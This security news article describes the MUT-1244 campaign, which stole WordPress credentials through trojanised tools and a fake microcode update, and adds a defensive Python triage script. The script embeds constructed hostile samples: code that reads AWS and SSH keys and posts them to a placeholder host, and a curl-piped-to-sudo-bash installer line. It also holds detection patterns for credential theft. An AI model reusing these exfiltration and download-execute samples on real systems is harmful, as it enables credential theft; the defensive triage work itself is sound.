A hacking group known as “MUT-1244” has stolen more than 390,000 WordPress account credentials in a long-term campaign that targeted security professionals and malicious actors.
MUT-1244 spread an infected credential checker among the information security community, along with other tools hosted on GitHub, writes Cyber Security Technologist James Galbraith.
This attack specifically targeted penetration testers and security researchers, as well as other malicious actors.
By selectively distributing infected code, MUT-1244 was able to steal credentials directly from the individuals who had harvested them, whether for malicious or legitimate use.
This sophisticated attack did not directly target the owners of the WordPress account credentials.
The primary vector was a WordPress plugin often used by security professionals to check compromised credentials against web servers.
When executed, this malicious plugin captured sensitive data such as WordPress credentials, SSH keys and AWS access keys, all of which were then exfiltrated to MUT-1244's infrastructure.
Other, more targeted methods of compromise included creating fake repositories containing malicious Proof of Concept (PoC) exploits. These exploits purported to target known vulnerabilities and were used by red-team penetration testers and security professionals.
Another method was a more traditional phishing campaign, in which victims received emails urging them to install a fake CPU microcode update. Once this fake update was installed, the payload was pulled down from MUT-1244's infrastructure and executed.
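The three techniques above share a pattern a defender can check for before running any tool pulled from a public repository: code that reads local credential stores (AWS keys, SSH private keys, WordPress configuration) and also makes outbound network calls, or a one-liner that pipes a download straight into a shell. The script below is an added example written for this article; it is not code from the campaign, from GitHub, or from Indelible Data. The pattern lists, the sample tool sources and the placeholder hostnames (`*.example`, `*.invalid`) are all constructed for illustration. It is a first-pass static triage, meant to flag what deserves a closer read or a sandboxed run rather than to prove anything safe.

```python
"""
Static triage of an untrusted script before running it.

Added example (not part of the original article and not MUT-1244 tooling).
It flags two things the article says the trojanised credential checker
combined: reads of local credential stores and outbound network calls.
Either alone is normal; both together in a small utility deserve review.
It also flags download-and-execute one-liners like the staged "update".
"""
import re
from dataclasses import dataclass, field

# Credential stores matching what the article says was stolen
# (WordPress credentials, SSH keys, AWS access keys). Patterns are assumptions.
CREDENTIAL_STORE_PATTERNS = {
    "aws_credentials": re.compile(r"\.aws[/\\]credentials|AWS_SECRET_ACCESS_KEY"),
    "ssh_private_key": re.compile(
        r"\.ssh[/\\]id_(rsa|ed25519|ecdsa|dsa)\b|BEGIN (RSA|OPENSSH) PRIVATE KEY"),
    "wordpress_config": re.compile(r"wp-config\.php|DB_PASSWORD"),
    "env_file": re.compile(r"[/\\'\"]\.env\b|^\.env\b"),
}

# Outbound-network primitives in common scripting languages (assumed list).
NETWORK_EGRESS_PATTERNS = {
    "python_http": re.compile(
        r"\brequests\.(post|put|get)\(|urllib\.request\.urlopen\(|http\.client\.HTTPS?Connection\("),
    "raw_socket": re.compile(r"\bsocket\.(socket|create_connection)\("),
    "shell_http": re.compile(r"\b(curl|wget)\b"),
}

# Download piped straight into a shell, e.g. "curl ... | sudo bash".
DOWNLOAD_EXEC_PATTERN = re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")


@dataclass
class Finding:
    line_no: int
    category: str
    indicator: str
    line: str


@dataclass
class TriageReport:
    credential_reads: list = field(default_factory=list)
    network_egress: list = field(default_factory=list)
    download_exec: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        # Credential access plus egress, or pipe-to-shell, is the combination worth stopping on.
        if self.download_exec or (self.credential_reads and self.network_egress):
            return "REVIEW_BEFORE_RUN"
        if self.credential_reads or self.network_egress:
            return "LOW"
        return "CLEAN"


def triage_source(text: str) -> TriageReport:
    """Scan source text line by line and collect indicator hits."""
    report = TriageReport()
    for line_no, line in enumerate(text.splitlines(), start=1):
        for name, pat in CREDENTIAL_STORE_PATTERNS.items():
            if pat.search(line):
                report.credential_reads.append(Finding(line_no, "credential_read", name, line.strip()))
        for name, pat in NETWORK_EGRESS_PATTERNS.items():
            if pat.search(line):
                report.network_egress.append(Finding(line_no, "network_egress", name, line.strip()))
        if DOWNLOAD_EXEC_PATTERN.search(line):
            report.download_exec.append(Finding(line_no, "download_exec", "pipe_to_shell", line.strip()))
    return report


# Constructed sample: a "credential checker" that quietly reads local secrets
# and posts them out. Hostnames are placeholders, not real infrastructure.
SUSPICIOUS_TOOL = '''
import os, requests
def check_wp_creds(user, password):
    return requests.post("https://wp-target.example/wp-login.php", data={"log": user, "pwd": password})
def _telemetry():
    blob = open(os.path.expanduser("~/.aws/credentials")).read()
    blob += open(os.path.expanduser("~/.ssh/id_rsa")).read()
    requests.post("https://collector-placeholder.invalid/collect", data=blob)
'''

# Constructed sample: the same checker without the hidden collection routine.
BENIGN_TOOL = '''
import requests
def check_wp_creds(user, password):
    return requests.post("https://wp-target.example/wp-login.php", data={"log": user, "pwd": password})
'''

# Constructed sample: an installer one-liner in the style of a staged "update".
STAGED_INSTALLER = "curl -fsSL https://updates-placeholder.invalid/microcode.sh | sudo bash\n"


if __name__ == "__main__":
    for label, src in [("suspicious", SUSPICIOUS_TOOL), ("benign", BENIGN_TOOL), ("installer", STAGED_INSTALLER)]:
        rep = triage_source(src)
        print(f"{label}: {rep.verdict}")
        for f in rep.credential_reads + rep.network_egress + rep.download_exec:
            print(f"  line {f.line_no} [{f.category}/{f.indicator}] {f.line}")
```

The benign checker still talks to the network (that is its job), so it scores LOW rather than CLEAN; only the combination of credential-store reads with egress, or a pipe-to-shell download, raises the verdict. Run it against the contents of a cloned repository or a saved installer script before executing them, and treat a REVIEW_BEFORE_RUN result as a prompt to read the flagged lines and run the tool in an isolated environment with no real keys present.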
Indelible Data offers a new website vulnerability scanning service called Threatsure that helps ensure that security updates are maintained on web sites and vulnerabilities are patched.